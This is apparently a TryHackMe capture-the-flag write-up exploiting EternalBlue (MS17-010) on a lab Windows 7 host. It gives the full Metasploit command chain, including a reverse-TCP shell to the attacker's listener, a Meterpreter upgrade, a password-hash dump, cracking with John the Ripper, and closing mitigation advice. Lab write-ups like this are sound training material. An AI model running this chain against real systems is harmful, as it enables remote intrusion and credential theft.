Post

Blue

A comprehensive guide to exploiting the EternalBlue vulnerability (MS17-010) on a Windows machine and performing post-exploitation activities.

Posted Updated
Preview Image
By Mustafa Eltayeb
3 min read
Blue

Blue - TryHackMe Writeup

Blue is a beginner-friendly room focused on exploiting the EternalBlue vulnerability (MS17-010) on Windows systems. This room teaches SMB exploitation, post-exploitation techniques, and password cracking.

Difficulty: Easy ⭐
Operating System: Windows 7/Server 2008
Themes: SMB Exploitation, EternalBlue, Post-Exploitation, Hash Cracking

Objectives

  1. Identify the EternalBlue vulnerability (MS17-010)
  2. Exploit the vulnerability using Metasploit
  3. Perform post-exploitation activities
  4. Capture all flags

Reconnaissance

Initial Port Scan

Started with a fast port scan to identify open services:

1

nmap --min-rate 10000 -p- 10.10.54.33

Results:

1
2
3
4
5

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Analysis: Standard Windows ports open including SMB (445) which is our primary target.

Vulnerability Scanning

Ran a targeted vulnerability scan on SMB ports:

1

nmap -p 445,135,139 --script vuln 10.10.54.33

Critical Finding:

1
2
3
4
5
6

| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Confirmed Vulnerability: MS17-010 (EternalBlue)

Initial Exploitation

Metasploit Setup

  1. Search for EternalBlue exploit:
    1

    msf6 > search ms17-010
  2. Select and configure the exploit:
    1
2
3
4
5

    msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 10.10.155.206
msf6 > set payload windows/x64/shell/reverse_tcp
msf6 > set LHOST 10.10.9.49
msf6 > set LPORT 4444
  3. Execute the exploit:
    1

    msf6 > run

Successful Exploitation:

1
2
3
4

[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.155.206:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (10.10.9.49:4444 -> 10.10.155.206:49251)

Shell Access Obtained:

1
2

C:\Windows\system32>whoami
nt authority\system

Already running as SYSTEM due to the nature of EternalBlue exploit.

Post-Exploitation

Shell to Meterpreter Upgrade

Backgrounded the shell session and upgraded to Meterpreter:

1
2
3
4
5
6
7
8

# Background the shell
C:\>^Z
Background session 1? [y/N] y

# Upgrade to Meterpreter
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 > set SESSION 1
msf6 > run

Meterpreter Session Established:

1

[*] Meterpreter session 2 opened (10.10.9.49:4433 -> 10.10.155.206:49268)

Process Migration

Migrated to a more stable process for persistence:

1
2
3
4

meterpreter > ps
# Identified wininit.exe (PID: 592) as a stable system process
meterpreter > migrate 592
[*] Migration completed successfully.

System Information

1
2
3
4
5
6
7
8

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1)
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Credential Harvesting

Dumping Password Hashes

1
2
3
4

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Cracking Jon’s Password

  1. Save the hash to a file:
    1

    echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt
  2. Crack with JohnTheRipper:
    1

    john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked Password: alqfna22

Flag Capture

Flag 1 - Root Access Proof

1
2

meterpreter > cat C:\\flag1.txt
flag{access_the_machine}

Flag 2 - SAM Database Access

1
2

meterpreter > cat C:\\Windows\\System32\\config\\flag2.txt
flag{sam_database_elevated_access}

Flag 3 - User Documents

1
2

meterpreter > cat C:\\users\\jon\\Documents\\flag3.txt
flag{admin_documents_can_be_valuable}

Key Takeaways

Attack Path Summary:

1
2

Port Scanning → SMB Vulnerability Detection → EternalBlue Exploitation → 
System Shell → Meterpreter Upgrade → Hash Dumping → Password Cracking → Flag Collection

Vulnerabilities Exploited:

  1. MS17-010 (EternalBlue) - Critical SMBv1 vulnerability allowing remote code execution
  2. Default/Weak Credentials - Crackable password hash

Mitigation Strategies:

  1. For MS17-010:
    • Apply Microsoft security update MS17-010
    • Disable SMBv1 protocol
    • Enable SMB signing
    • Use network segmentation
  2. For Credential Security:
    • Implement strong password policies
    • Enable account lockout policies
    • Use multi-factor authentication
    • Regular password audits

Tools Used:

  • Nmap - Port scanning and vulnerability detection
  • Metasploit - Exploitation framework
  • JohnTheRipper - Password cracking
  • Meterpreter - Post-exploitation toolkit

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb

tryhackme
TryHackMe EternalBlue MS17-010 Metasploit SMB Exploitation Windows Privilege Escalation
This post is licensed under CC BY 4.0 by the author.